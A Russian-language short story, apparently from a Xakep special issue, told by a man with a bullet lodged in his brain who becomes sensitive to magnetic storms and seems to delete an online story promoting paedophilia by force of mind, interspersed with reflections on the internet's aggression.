Количество сайтов, посещаемых мной за один заход, намного больше, чем количество газет и журналов, которые я реально могу выписать и прочитать. Экран я протираю чаще, чем чищу обувь. И вообще, мой компьютерный стол - это моя квартира в миниатюре. Вот тут, справа, где стоит телефон, у меня столовая; там и сейчас лежит бумажный пакет с чизбургерами. Слева, на сканере, у меня книжная полка - правда, там не пахнет Тургеневым и Ахматовой, но многие из моих друзей с радостью бы «опустились» до подобных авторов - стоит упомянуть хотя бы Мэри Шелли и Владимира Васильева. Только не думайте, что у меня в кресле дырка для дерьма - ее там нет. Как нет и катетера, воткнутого в мочевой пузырь и направляющего отходы в пластиковую бутылку, привязанную к поясу. Я пока в состоянии оторваться от монитора. Хотя бы для того, чтобы закинуть в желудок пару таблеток.

Так что я подобен вам - как подобны треугольники в теореме. Углы одинаковы, разница только в сторонах. Но это у треугольников. А у нас...

У нас вся разница - в уровне агрессии, в степени воздействия Сети на вас и вашего на Нее. Ведь не секрет, что Сеть не пришла в нашу жизнь, она в нее ворвалась, вторглась (иначе как «вторжением» назвать это трудно). И вот теперь кто-то изливает в Интернет амбиции, а кто-то их впитывает.

Вы скажете: «А как же те, кто борется с чужими амбициями?» Все предельно ясно - он насаждает свои. Так что сторон всегда две.

ИНТЕРНЕТ НЕ ДЛЯ СЛАБЫХ.

Хуже Интернета, агрессивнее его может быть только тот, кто БЕРЕТ ЗА НЕГО ДЕНЬГИ. Плата за трафик - это все равно что собирать чьи-то слезы. Запомните - ваш провайдер делает деньги на вашей психике. Он богатеет - вы сходите с ума. Он показывает вам, что нажимать, - вы нажимаете. Вы думаете, что он открыл вам весь мир, стер границы? Так и есть. Вы знаете, чем отличается нормальный человек от шизофреника?


Спецвыпуск Xakep, номер #029, стр. 029-116-3, УРОВЕНЬ АГРЕССИИ

УРОВЕНЬ АГРЕССИИ

Спецвыпуск Xakep, номер #029, стр. 029-116-3

У нормальных людей в анализе информации и синтезе ответа принимает участие всего четыре процента мозговых клеток. Всего ЧЕТЫРЕ! А что же остальные? Остальные ждут, хранят в себе чертову уйму всяких отбросов, накопленных эволюцией за миллионы лет. И все это называется «принцип узкого горлышка». В один прекрасный день это самое «узкое горлышко» вашего графина с мозгами по причинам не вполне понятным (пока!) трескается, и от него отваливается кусочек. Небольшой такой кусочек, который дает возможность проникнуть в ваши мозги некоему количеству информации, для обработки которой четырех процентов становится маловато. И мозг включает еще столько же. Итого? Под рукой есть калькулятор? Совершенно верно, восемь. Вот и вся разница между нормой и патологией - ЛИШНИЕ четыре процента.

А теперь подумайте - какими методами можно заставить человека раскрыть свои дополнительные ресурсы, включить недостающие нервные клетки в информационный оборот; иными словами - что надо сделать, чтобы у графина откололось горлышко?

Хочу указать вам, что вы снова на неверном пути - я не пытаюсь вам объяснить, что Интернет взламывает наши черепные коробки, увеличивая количество дебилов в мире. Я пытаюсь размышлять отвлеченно, как психиатр у постели больного. Главное - выделить основные составляющие - например, психо-эмоциональное напряжение, стрессы, страхи. Можно к этому добавить опухоли мозга и еще какую-нибудь казуистику, но это уже не то. Отталкивайтесь от факта, что все люди разные - но за ЧЕРТОЙ они становятся одинаковыми (по крайней мере, об этом твердят учебники). То есть - постулат о том, что «каждый сходит с ума по-своему», - верен.

Значит, мы все с вами на пути ТУДА.

Интернет нам поможет.

С каждым днем мы должны перерабатывать все большие объемы информации. Все более мощные потоки негатива и позитива вливаются на наши винчестеры, а оттуда туманом и дурманом проникают в наши с вами души.

Как вы думаете, если бы у Робинзона Крузо на острове был комп, подключенный к Сети, - каков бы был итог? Почти тридцать лет в одиночестве - наедине со всем миром?

Настоящий Робинзон, послуживший прообразом книжного, сошел с ума окончательно и бесповоротно - он ловил диких коз, сворачивал им шеи и ел сырое мясо; он забыл человеческую речь и полностью одичал. Попытайтесь представить его за «Макинтошем» (с тем условием, что он не стремился бы на Большую Землю)... Вся проблема в том, что условия, в которых волей судьбы оказался несчастный моряк, были чересчур идеальными - бесконечное лето, изобилие пищи и воды, да и организм его не испытал на себе ужасы СПИДа и лучевой болезни. Судя по всему, компьютер мог только ускорить темпы его сумасшествия. Вначале его винчестер просеял бы сквозь себя все порносайты мира, потом он изгадил бы все мало-мальски известные чаты, а дальше - опять те же дикие козы, сожранные едва ли не живьем.


Спецвыпуск Xakep, номер #029, стр. 029-116-4, УРОВЕНЬ АГРЕССИИ

УРОВЕНЬ АГРЕССИИ

Спецвыпуск Xakep, номер #029, стр. 029-116-4

Судя по всему, Робинзон был обречен. А теперь оглянитесь. Кто из вас озабочен борьбой за существование? Когда вы в последний раз добывали огонь? Неужели у вас нет зимних ботинок? «Цветной телевизор, автоматическая коробка передач и теплый горшок...» Основные блага цивилизации. Плюс компьютер.

Не надо никаких необитаемых островов. Мы станем ловить диких коз и, захлебываясь хлещущей из яремных вен кровью, жрать их прямо посреди Лондона, Нью-Йорка и Сиднея. Кто-то раньше, кто-то позже. ХУЖЕ ВСЕГО ТО, ЧТО КТО-ТО ЗАНЯТ ЭТИМ УЖЕ ДАВНО.

Черт возьми, ну почему никто до сих пор не спросил меня: «Откуда все это? На основании чего рождаются такие пессимистические прогнозы, граничащие с сюрреализмом? Кто ты, mother fucker?».

Я хочу дать вам совет. Зайдите на любой новостной сайт и почитайте заголовки за последние пару дней. Только заголовки. Не лезьте по ссылкам дальше. Прочитали?

Господа, ПЕРЕД ВАМИ ПОРТРЕТ НАШЕЙ ЦИВИЛИЗАЦИИ.

Вот теперь пришло время поговорить и обо мне.

2.

Когда-то я был одним из вас. У меня были имя, фамилия, работа, семья, машина, хобби и еще много всего такого, что делает нас похожими друг на друга. Я был порядочным семьянином, ответственным работником, не нарушал правил дорожного движения (да и вообще не имел проблем с законом), выгуливал свою собаку, мечтал о том, как жена родит мне сына, и периодически проводил время за компьютером. Он был для меня источником денег и развлечений, за ним я работал, мечтал, размышлял, планировал... Я не очень отличался от своих соседей, друзей и коллег. Конечно, у каждого из нас есть свой скелет в шкафу, но я, как это лживо ни прозвучит, почему-то никогда не мог вспомнить - в каком же из шкафов моей памяти хранится этот самый скелет. Судя по всему, я относился к тому меньшинству, которое либо счастливо избежало своих скелетов, либо не менее счастливо о них забыло.

Два года назад все изменилось. Все. Вся жизнь, что была «до», перестала существовать.

Знаете, есть вещи, о которых никогда не думаешь. То есть ты всегда уверен в обратном. Ты абсолютно точно знаешь, что не попадешь под машину; само собой, самолет, в котором ты полетишь, не упадет; цирроз печени поразит твоего соседа; вокруг тебя не может быть террористов, снайперов, серийных убийц, открытых люков и оголенных проводов. И когда случается что-нибудь из приведенного списка катастроф, большинство людей теряет стимул к жизни; сколько людей в подобных ситуациях превратилось в алкоголиков и наркоманов, лишилось работы и дома. Я - не исключение.

Два года назад я вышел из подъезда собственного дома, остановился на крыльце, порадовался нежной теплоте весеннего солнца, еще раз дал себе слово бросить курить, представил, как нежится сейчас в постели моя жена, - и шагнул из-под козырька. Через мгновенье пуля, выпущенная из снайперской винтовки, сделанной по индивидуальному заказу, вонзилась мне в голову.


Спецвыпуск Xakep, номер #029, стр. 029-116-5, УРОВЕНЬ АГРЕССИИ

УРОВЕНЬ АГРЕССИИ

Спецвыпуск Xakep, номер #029, стр. 029-116-5

То, что вы сейчас слушаете меня, - не моя заслуга; скорее, это халатность снайпера. Имея такую оптику, какая стояла в тот день на винтовке, можно было на спор попасть мне в ноздрю. По неизвестной причине пуля попала мне в левую височную долю - хотя должна была вынести мозги в количестве полутора килограммов, прострелив голову насквозь.

Скажу вам сразу - это крайне неприятно. Когда некая невидимая сила останавливает тебя и отправляет на пару метров назад со скоростью пассажирского поезда - это, стоит заметить, непередаваемые ощущения. Но не будем заострять на этом внимание.

Итак, выстрел был сделан. Как потом установит следствие, снайпер в тот день ошибся дважды - когда мне, пришедшему в сознание в реанимации, показали фотографию моего соседа, проживающего тремя этажами выше и являющегося вице-президентом крупного банка, я вначале подумал, что это я сам; но потом, разглядев, что мужчина на фото зачесывает волосы в другую сторону, я понял все без лишних комментариев. Он ПЕРЕПУТАЛ. А потом еще и не попал.

Короче, я едва не стал жертвой заказного убийства. Почти две недели после операции я провел в реанимационном отделении; там же узнал, что пулю извлечь не удалось. Какие-то центры, жизненно важные, могли быть повреждены при попытке достать ее из глубины мозга. Нейрохирург не отважился; а я был в том состоянии, что попросить об этом не мог. Да мне, честно сказать, было все равно.

На двенадцатый день, когда готовился мой перевод в общую палату, мне было назначено исследование, которое мой врач назвал «ядерно-магнитным резонансом». Достаточно прогрессивное словосочетание в наш век технических революций. Что вы подумали, если бы узнали, что это переориентация магнитных моментов атомных ядер? Вот и я - не понял ровным счетом ничего. А они просто хотели увидеть мои мозги с пулей на экране компа в трехмерном варианте.

Меня в кресле-каталке прикатили в рентген-отделение, помогли вскарабкаться на футуристического дизайна стол, где я, абсолютно голый, с неподдельным интересом ожидал чего-то необычного. Где-то вдалеке зашумели сервомоторы, на меня стало надвигаться сооружение, похожее на полуокружность, вращающееся вокруг меня; оно медленно ползло от ног к голове. Я внимательно следил за этим предметом, разглядев на внутренней его поверхности большое количество датчиков.

Приблизившись к моим плечам, эта штука замерла. Ко мне подошла медсестра, попросила снять нательный крестик и зажать его в кулак. Я подчинился. ЗАПОМНИТЕ ЭТОТ МОМЕНТ.

Если когда-либо вы будете стоять перед выбором «все или ничего» - не стоит опрометчиво жертвовать символами. Я думаю, что тогда, когда я стащил с шеи шелковый шнурок и сжал в ладони маленький плоский крестик - именно в это мгновенье я распрощался со своей прошлой жизнью.

Спустя пару секунд невидимые моторы вновь принялись медленно вращать полуокружность аппарата, приближая его к моей голове. Где-то на экранах уже возникали срезы моей шеи с шагом в два миллиметра; несколько нейрохирургов застыли перед компьютерами, ожидая увидеть нечто, достойное диссертации. Мои глаза были прикованы к датчикам, периодически сверкающими яркими лучиками; аппарат уполз куда-то вниз, под стол...


Спецвыпуск Xakep, номер #029, стр. 029-116-6, УРОВЕНЬ АГРЕССИИ

УРОВЕНЬ АГРЕССИИ

Спецвыпуск Xakep, номер #029, стр. 029-116-6

Открыв глаза, я увидел прямо перед собой экран цветного телевизора; шли новости. Симпатичная дикторша пыталась объяснить мне причины подорожания нефти и других энергоносителей. Оглянулся по сторонам; слева была салатовая кафельная стена, справа - белая ширма; за ширмой кто-то хрипел. Помещение было мне незнакомо.

Каким-то десятым чувством я понял, что на лице у меня - многодневная щетина. Провел рукой, убедился в собственной правоте. На исследование я уходил гладко выбритым, значит... Да черт его знает, что это значит!

Приподнявшись на локтях, я огляделся. Просторная палата, увешанная и заставленная огромным количеством аппаратуры; плотно закрытые двери с непрозрачным стеклом; пост медсестры - пустует, разложены раскрытые журналы, горит настольная лампа. Хрип за ширмой начинал раздражать.

Попытавшись встать, я понял, что сил мне на это может не хватить; я быстро покрылся холодным липким потом, руки мелко затряслись, я упал на подушку. Прислушавшись к своему внутреннему состоянию, я пришел к неутешительному выводу - по-видимому, со мной что-то случилось во время исследования, что-то вроде побочного действия этого самого резонанса, и я попал то ли в реанимацию, то ли в палату интенсивного наблюдения... Сколько времени я провел здесь?

Внезапно хрип за ширмой затих. Одновременно с этим запиликал какой-то очень громкий датчик. Спустя несколько секунд дверь распахнулась, вошли две молоденькие медсестры и направились к той постели, что была скрыта от меня натянутой на каркас простыней. И одна из них встретилась со мной взглядом.

Я попытался улыбнуться. Она закричала и упала в обморок. Вторая остановилась; правая щека у нее странно задергалась.

Тогда я раскрыл рот, чтобы произнести что-нибудь успокаивающее и ободряющее. Вторая девочка едва не споткнулась о свою подругу, лежащую на полу, и вылетела в коридор...

Спустя десять минут в шоке был уже я - выслушав все то, что мне рассказал дежурный реаниматолог.

Сцепив руки под одеялом и сжав до боли зубы, я слушал, слушал... Факты убивали меня.

Я пролежал в боксе реанимационного отделения один год и два месяца - находясь в состоянии комы. Моя жена развелась со мной четыре месяца назад и уехала к матери; теперь между нами была пропасть в четыреста дней и шесть с половиной тысяч километров. Моя корпорация уволила меня, найдя какие-то зацепки в страховом кодексе. И лишь моя пуля в башке никуда не делась - она тихо сидела в левой височной доле.

Когда лучи ядерно-магнитного резонанса коснулись ее, мои глаза закрылись, дыхание стало редким и поверхностным, пульс - едва ощутимым. Врачи с интересом разглядывали изнанку моего черепа - а кома уже охватила меня, отключила сознание, заставила расслабиться все мои мышцы. Лаборантка, просившая меня снять крестик, вернулась ко мне, чтобы позволить подняться - но я уже был не здесь... Никто так и не понял, что произошло, случай не был описан в практике подобного метода исследования. Нашлись люди, попытавшиеся внести ясность в этот вопрос, защитили несколько работ - но я уверен, что все они были далеки от истины.


Спецвыпуск Xakep, номер #029, стр. 029-116-7, УРОВЕНЬ АГРЕССИИ

УРОВЕНЬ АГРЕССИИ

Спецвыпуск Xakep, номер #029, стр. 029-116-7

Я и сам по сей день не знаю, что случилось с моими несчастными мозгами, после операции ставшими легче на сто-сто пятьдесят граммов, которые нейрохирург просто вычерпал ложкой из черепной коробки. Но не это главное...

Я пришел в себя. Я смог вернуться домой. Мне дали инвалидность; я получал небольшую пенсию. Мои старые друзья, общаясь со мной, не замечали ничего напоминающего о том, что когда-то в мою голову попала пуля да так там и осталась; что я провел в состоянии, гораздо более близком к смерти, чем сама смерть, больше года. Казалось, что все позади.

Впрочем, осталось кое-что, напоминавшее мне о случившемся - магнитные бури на Солнце. Я стал жутким метеопатом; бури сводили меня с ума...

До того рокового выстрела, изменившего мою жизнь, я скептически относился к заявлениям людей, изо дня в день сверяющих свое артериальное давление с календарем магнитных возмущений на Солнце. Усмешка всегда появлялась на моем лице при одном лишь упоминании о том, что у кого-то заныли суставы, предвещая проблемы в магнитном поле Земли. Честно сказать, я в это не верил. Не верит и большинство из вас, несмотря на многочисленные заверения ученых в реальности проблемы. Дай бог, чтобы ваше мнение об этом не менялось, чтобы вы были здоровы и не страдали так, как страдаю я.

Вернувшись домой, я обратил внимание на то, что одолевавшие меня приступы головных болей, начавшиеся едва ли не в первый же день моего «воскрешения», подчинялись некоей схеме - достаточно неопределенной, но привязанной к какому-то источнику. К этому выводу я пришел спустя пару месяцев пребывания дома. Однажды, держа в руках газету с ежедневными новостями, я обратил внимание, что постоянно пробегаю глазами маленькую серую рамку в углу предпоследней страницы - не глядя, что там, не вчитываясь в эти маленькие буковки. Это оказался прогноз магнитных бурь на месяц. И тогда я стал ставить галочки в календаре.

Как вы думаете, что получилось? Легко предположить. Мои приступы сильных, всеобъемлющих, жестоких и еще не знаю каких болей где-то под послеоперационным рубцом начинались всегда через два дня после возмущений на Солнце. Я могу с полной уверенностью заявить - уж в чем, а в расписании магнитных бурь «Гидрометеоцентр» практически не ошибается. Можно в ясный день за несколько мгновений вымокнуть под внезапно набежавшим дождем, о котором синоптики не упомянули накануне ни слова; можно спланировать лыжную прогулку и попасть под плюсовую температуру, прилипая к лыжне; я же планировал свое существование по графику бурь абсолютно безошибочно.

Запасаясь «Солпадеином», я с ужасом ожидал приближения очередного кошмара. Месяц, в течение которого было меньше шести магнитных бурь, я считал очень и очень удачным. Обращался к лучшим невропатологам - никакого результата. Любые процедуры и лекарства, назначаемые мне, оказывались бессильными против невидимых щупалец, терзающих магнитное поле вокруг меня.


Спецвыпуск Xakep, номер #029, стр. 029-116-8, УРОВЕНЬ АГРЕССИИ

УРОВЕНЬ АГРЕССИИ

Спецвыпуск Xakep, номер #029, стр. 029-116-8

Я обнаружил в себе неприятную черту - я стал ненавидеть здоровых людей. Тех, кто понятия не имеет о том, что чувствую я. К тому времени я уже начисто забыл то, как сам когда-то был здоров и посмеивался над такими, как я теперешний. Я понимал свою необычность и исключительность; не у каждого человека в голове есть кусок расплющенного свинца, не каждый в состоянии получить пулю в голову и остаться после этого в живых. Но на кой черт, скажите, мне эта исключительность, если я оказался на самом дне жизни!

Однажды я вдруг осознал, что самой первой магнитной бурей в моей жизни была та, которую вызвал в моей голове ядерно-магнитный резонатор. Что-то случилось с моими мозгами; пуля, вонзившись в череп, произвела там необратимые разрушения, приведшие к тому, что я стал своеобразным приемником магнитных излучений. И едва я это понял, как следом пришло понимание необратимости. Изменить ничего было нельзя; пуля покрылась капсулой из рубцовой ткани; мозги, нанизанные на нее, приобрели новые свойства, с которыми не собирались расставаться.

Я пробовал пить. Это ничего не меняло. Только голова начинала болеть гораздо чаще, откликаясь на каждое похмелье. Пришлось оставить этот веками проверенный способ и искать другого спасения.

Прочитал «Мертвую зону». Попытался найти общие черты между мной и Джоном Смитом, пролежавшим в коме намного больше, чем я. Из книги извлек лишь одну утешительную мысль - в моем положении остается рассчитывать только на то, что все свершается с некоей великой целью. Хотелось надеяться, что мои мучения завершатся, наконец, появлением передо мной чего-то значимого, ради чего стоит терпеть все происходящее...

И это ЗНАЧИМОЕ не заставило себя долго ждать.

3.

Оглядываясь в прошлое, можно с большой долей вероятности определить существование Сети и нашу с вами жизнь в ней как один большой «versus». В Интернете всегда кто-то «за», а кто-то «против». Каждую секунду кто-то кому-то пытается доказать некие истины, оспаривать мнения других, навязывать свои...

Достаточно вспомнить «войну операционных систем» - бесконечный «Windows versus Unix», отнимающий у миллионов людей время, эмоции и здоровье. Сколько людей одновременно, сидя за экранами компьютеров, выстукивают в чатах «Linux forever!!!»; какое количество однообразной информации переливается с одних винчестеров на другие в надежде поставить точку в этом споре? И на что надеется каждый из спорящих? Что он собирается сделать со своей вероятной победой? Как он воспользуется ее плодами?

ВЕДЬ В СПОРАХ НЕ БЫВАЕТ ПОБЕДИТЕЛЕЙ.

Чего стоит на самом деле «война браузеров» или «Delphi vs. C++»? Как вы думаете, стоит ли спорить о том, что нельзя подержать в руках?

Можно долго продолжать список бессмысленных дебатов в Сети и околосетевой литературе - но тогда на основе этого перечисления взрастет еще один «versus». Мне бы этого очень не хотелось.

Задумайтесь над непреложным фактом - мы с вами заражены Интернетом. Благодаря ему мы сумели «ощутить» весь мир, биение его пульса у себя дома. И вот он вошел к нам в дом - и мы не нашли ничего лучшего, как начать все ставить с ног на голову. Все вроде бы хорошо - но нет, не так, как хотелось бы.


Спецвыпуск Xakep, номер #029, стр. 029-116-9, УРОВЕНЬ АГРЕССИИ

УРОВЕНЬ АГРЕССИИ

Спецвыпуск Xakep, номер #029, стр. 029-116-9

Какой из браузеров быстрее открывает страницы? Какая операционная система не «стучит» на своего хозяина? На каком языке лучше писать вирусы и гадить на винтах своих друзей? Какой антивирус тщательнее и надежнее выдирает из почты все то, что породил воспаленный мозг студента из Торонто? Неужели вы до сих пор используете «Outlook»?

О чем все эти вопросы?

Я отвечу вам. Они - ни о чем.

Мы - рабы. Рабы своих вопросов и ответов. Ибо они - ничто. Мы спорим о способах доступа и работы в виртуальности - в пространстве, порожденном воображением. И пусть компьютеры помогают нам прокладывать курс кораблям, лечить людей, решать сложные задачи фундаментальной науки - с этим я, несомненно, согласен. Все остальное - от лукавого. Его имя вам известно.

Назовем это «INTERNET VERSUS...»

Пусть каждый подставит вместо многоточия все, что сочтет нужным.

Я всегда был практичным человеком, по натуре своей скептиком; «Все подвергай сомнению» - мой девиз на протяжении многих лет. Будучи студентом, я мог часами разглагольствовать о смысле жизни, любви и прочих нематериальных вещах. С течением времени мне расхотелось тратить на это время. Не помню, что послужило к этому толчком - неразделенная страсть или что-то еще, столкнувшее меня лбом с реальностью, - но факт остается фактом. Когда же в моей голове обосновался кусочек свинца, подаривший незабываемые мгновенья магнитных бурь, - Интернет вошел в мою жизнь именно с этой стороны - со стороны «VERSUS»...

Первые несколько недель после выписки из больницы я мотался по врачам - снова и снова, пытаясь излечиться от той напасти, которой меня наградила жизнь, но все было тщетно. Процедуры и лекарства, невропатологи и экстрасенсы, массаж и иголки... По мне можно было сверять график солнечной активности.

Но вот настал тот день, когда я мог обоснованно подтвердить постулат - «Человек привыкает ко всему». Однажды утром, проснувшись от сильной головной боли, я вдруг понял, что она стала привычной, в чем-то даже необходимой. Она заставляла жить, двигаться, бороться. Без нее мне было как-то не по себе.

И я решил жить дальше - как будто ничего не произошло. Я понимаю, что сложно представить себе человека, который относится к больному зубу, как к чему-то совершенно обыденному (вспомните себя с рукой, прижатой к щеке, с горстью таблеток на столе и слезящимся глазом). Но как только понимаешь, что это всего лишь импульс тройничного нерва, усиленный воспалением, - начинаешь уважать свою периферическую нервную систему.

Тем же самым утром, которое подарило мне новую надежду, я решил продолжить начатую ранее работу. Когда-то давно («в прошлой жизни») на меня напала графомания; я принялся печатать на компьютере какие-то повести с примесью фэнтези, отдавая дань великому Толкиену. Почему бы не попробовать сделать это заново?

Я построил стену между собой и болью, непрерывно в такие дни присутствующей в моей голове. Монитор засветился давно забытым мягким светом. Я сидел во вращающемся кресле, легонько подкручивая его ногами, и вспоминал те дни, когда все было иначе... Боль ненадолго отступила. Я порылся в файлах, нашел кое-что из недописанного и принялся за чтение и доработку.


Спецвыпуск Xakep, номер #029, стр. 029-116-10, УРОВЕНЬ АГРЕССИИ

УРОВЕНЬ АГРЕССИИ

Спецвыпуск Xakep, номер #029, стр. 029-116-10

Спустя некоторое время я ощутил в себе силу; компьютер вбирал в себя ту отрицательную энергию, которая накопилась во мне. Слова складывались в строки; несмотря на случившееся, я не утратил способности к подобному труду. Что-то похоже на оптимизм появилось в моей душе. Чувство, за последнее время напрочь забытое, - чувство уверенности ухватывало меня с каждой страницей.

За компьютером тогда я провел около трех часов, окунувшись в мир фэнтези, мечей, эльфов и прочей красоты. Финал давно брошенной повести случился как-то сам собой, вполне логичный и даже в какой-то мере захватывающий (как вообще может автор судит о своих произведениях). Тогда, впервые осмелев и ошалев от собственной смелости, я полез на Lib.ru с благородной целью - опубликоваться в «Самиздате», создав там собственный раздел, и явить миру свои творения в надежде получить хоть какие-то комментарии.

К тому времени головная боль, терзавшая меня с утра, уже успокоилась и напоминала о себе лишь изредка тупой пульсацией в области затылка. Зайдя на сайт «Библиотеки Мошкова», я достаточно быстро разобрался с регистрацией, но прежде чем начать что-либо делать, я принялся изучать заголовки новых поступлений, просматривать комментарии и периодически вчитываться в абзацы выложенных произведений; несколько раз я искренне позавидовал авторам, писавшим на порядок лучше и интереснее меня.

Время от времени я с усмешкой кидал взгляд на упаковку «Солпадеина»; мне было спокойно, как никогда, боль не терзала меня; хотелось ЖИТЬ. Скроллинг медленно сдвигал вниз огромное количество ссылок, появившихся на Lib.ru за сутки.

Внезапно что-то болезненно толкнулось изнутри в левый висок. Я замер; палец на колесике остановился. Отпустило. Медленно поведя глазами из стороны в сторону, я отчетливо представил себе, как внутри моей головы шевельнулась пуля - и страх смерти сковал мои мышцы; челюсти свело, на лбу выступили крупные холодные капли, задрожали губы.

Возникло ощущение того, что меня окунули в кисель, - я практически перестал слышать телевизор за своей спиной, глаза заслезились. Я с большим трудом проглотил комок вязкой слюны и медленно, очень медленно, протянул руку за таблетками. Ничего подобного раньше со мной не случалось.

Новый толчок. Если бы я мог видеть себя со стороны - могло бы показаться, что внутри моего черепа кто-то очень и очень сильный раскачивается из стороны в сторону. Я промахнулся мимо упаковки и вскрикнул. Самым краешком зацепила мысль о том, что не смогу разжевать растворимую таблетку - мне был нужен стакан воды. О том, что таблетка в принципе может и не помочь, я не задумывался.

Сквозь большие напряженные капли слез в глазах я видел размазанный текст на экране компьютера. Очередной удар изнутри в левую половину головы заставил слезу скатиться по щеке в угол рта; я с ужасом понял, что умираю. Удары стали чаще и сильнее, я, не раздумывая, рванул на себе упаковку таблеток, выхватил сразу две и сунул их в рот. Язык зажгло, защипало щеки; я стал захлебываться пеной.


Спецвыпуск Xakep, номер #029, стр. 029-116-11, УРОВЕНЬ АГРЕССИИ

УРОВЕНЬ АГРЕССИИ

Спецвыпуск Xakep, номер #029, стр. 029-116-11

Ситуация полностью вышла из-под контроля. По моему подбородку текли пенистые струйки, я представлял собой жалкое зрелище. Изображение на мониторе постепенно расплывалось, смазывалось в рисунок масляными красками. Постепенно мрак надвинулся на меня, сузив комнату до узкой полосы прямо перед глазами; вскоре исчезла и она...

Очнулся я в кресле - в расслабленной позе, с набухшим, обожженным языком; рубашка была испачкана вытекшим «Солпадеином» - короче, выглядел я хреново. Судя по часам в трее, в таком виде я просидел за компом около сорока минут. Руки первым делом машинально попытались стереть засохшую корку лекарства с лица; очень хотелось пить, унять тот пожар во рту, что вызвала пара таблеток.

Приподнявшись в кресле, я прислушался к своему внутреннему состоянию; у меня ничего не болело, кроме многострадального языка. Голова была достаточно ясной - насколько она может быть ясной у человека, почти час провалявшегося без сознания. Вспомнив, что со мной было, я провел рукой по левой половине головы - там, где под уже отросшей шевелюрой скрывались послеоперационные рубцы. Толчки больше не повторялись.

Протянув руку к «мышке», я хотел выключить компьютер и пойти умыться, но на экране мой взгляд привлекла маленькая деталь - одна из ссылок была каким-то особенным образом размазана, словно оставила шлейф при скроллинге; вокруг букв, образующих ее, я отметил слабое свечение. Едва линк привлек мое внимание, как в левом виске что-то шевельнулось - именно шевельнулось, не ударило. Осторожно, направляюще - будто подсказывая.

И я, не обращая внимания на испачканное лицо и жажду, ткнул стрелкой в эту ссылку.

Это оказался рассказ некоего молодого автора, проповедующего педофилию. Не вдаваясь в подробности, скажу - на любителя. Но дело было не в этом. У меня закружилась голова. На секунду я представил количество произведений самых разных жанров и авторов, накопленных на просторах Интернета, оценил проходимость сайтов, занимающихся подобной информацией, - ужас охватил меня. А ведь литература - лишь один из способов воздействия на мозги...

Судя по индексу посещаемости, рассказ не пользовался особой популярностью - однако я знал, что где-то есть человек, который прочитал этот рассказ и расценил его как указание к действию.

Я видел его сидящим на диване с несколькими листами бумаги, на которых был распечатан рассказ. Он внимательно изучал текст, потом закатывал глаза к потолку - так что зрачки исчезали под веками - и мечтательно улыбался. А ребенок, который должен был стать его жертвой, еще ни о чем не догадывался.

Поверьте мне, я не хочу рассказывать вам о том, что творилось у меня на душе. Мы все, люди хоть с каким-нибудь интеллектом, порой испытываем подобные эмоции.

Я ПРОСТО ХОТЕЛ ПОМОЧЬ...


Спецвыпуск Xakep, номер #029, стр. 029-116-12, УРОВЕНЬ АГРЕССИИ

УРОВЕНЬ АГРЕССИИ

Спецвыпуск Xakep, номер #029, стр. 029-116-12

Казалось, что мой висок треснул по шву. Дыхание прервалось, сердце взметнулось в грудной клетке, как птица; мощь магнитной бури, отодвинутая от меня болеутоляющей таблеткой, вновь вонзилась в меня. Телефонный провод, протянутый по плинтусу, внезапно засветился ярким голубоватым светом - словно он принял в себя мою боль. Все продолжалось пару секунд.

Мне очень не хотелось потерять контроль над ситуацией. Я сумел удержаться на плаву, вцепившись руками в подлокотники; костяшки пальцев побелели, руки свело серией судорог.

Потом все ушло. Будто на электрический стул перестали подавать ток. Я в последний раз вздрогнул и обмяк, словно студень.

Ссылка исчезла со страницы.

Я попытался увидеть вновь того человека, читающего на диване, - безрезультатно. Зато я очень ясно представил (именно «представил» - ибо это уже имело отношение скорее к банальным переживаниям), как где-то далеко играет в песочнице ребенок в красной шапочке. А ведь это мог быть мой не родившийся сын от не вовремя ушедшей жены...

В тот день пуля больше не шевелилась.

4.

Я долго не знал - плакать мне или радоваться. Приобрести необычные способности - кому этого не хочется? Кто не мечтал о том, чтобы владеть телекинезом, читать мысли на расстоянии, левитировать? И это я еще называю одни из самых экзотических и желаемых возможностей. А сколько существует всякого рода мелочей, которыми человек жаждет обладать?

«Я сам из тех, кто спрятался за дверь, кто духом пал и не во что не верит...» Эти строки я не раз примерял на себя после выписки из больницы. Я уже морально был готов провести свою жизнь взаперти, иногда встречаясь с избранными друзьями, - лишь бы укрыться со своим недугом от окружающего мира, не афишировать свою боль и свои переживания. Будучи по натуре своей человеком гордым и независимым, я был уверен в том, что чужая жалость вначале будет меня раздражать, но потом все-таки сломает.

Порой, стоя у окна и наблюдая чужую жизнь, текущую по своим законом далеко внизу, я ловил себя на мысли, что отказываться от всего этого достаточно глупо - сколько людей в мире продолжают жить, сидя в инвалидных колясках, потеряв зрение, оставшись без рук и ног. Но я был уверен, что социальной реабилитации можно подвергнуть любого из них - но ни в коем случае не меня.

Я был исключением из правил. Человеком с простреленной головой. Нельзя жить в обществе, подчиняясь календарю магнитных бурь. Меня станут бояться. Меня будут жалеть. И я шагну с балкона...

Следующие два дня были для меня сущим адом. Видимо, Солнце разошлось не на шутку, надеясь уничтожить меня своим излучением. Я провел все это время на диване, не раздеваясь, вытащив из холодильника и поставив рядом с собой в пределах досягаемости несколько бутылок минеральной воды, чтобы растворять свое любимое лекарство - я боялся, однажды очнувшись, понять, что сил двигаться больше нет.

В моменты просветления сознания, когда боль отступала, я пытался философствовать; искал и не находил объяснения тому, что со мной случилось. Каким-то невероятным образом я сумел стереть ссылку на сервере, находящемся от меня очень и очень далеко, - не используя для этого ничего, кроме указующего перста, стучащегося изнутри в мою черепную коробку.


Спецвыпуск Xakep, номер #029, стр. 029-116-13, УРОВЕНЬ АГРЕССИИ

УРОВЕНЬ АГРЕССИИ

Спецвыпуск Xakep, номер #029, стр. 029-116-13

Подвести под это какую-нибудь теорию было очень и очень сложно. Я терялся в догадках, но не особенно напрягался, чтобы решить эту задачу. Человек в моем положении легко смиряется с происходящим. Если вы неизлечимо больны - вы перестаете спорить с самим собой, перестаете сопротивляться; но не сразу, не с первого дня. Вы должны к этому приблизиться, шаг за шагом, минута за минутой, переживая боль снова и снова. И если в момент, когда вы уже готовы залезть в петлю, на вас сваливается что-то вроде того, что случилось со мной, - вы воспримете это как нечто, пришедшее в вашу жизнь для того, чтобы усложнить ее больше. Так поступил и я.

У меня, безусловно, был выход из создавшейся ситуации. Я мог никогда больше не подходить к компьютеру; я мог отказаться от Интернета. А если случившееся со мной носило характер случайности? Как тогда поступить? Способ был один - проверить это, сидя за экраном.

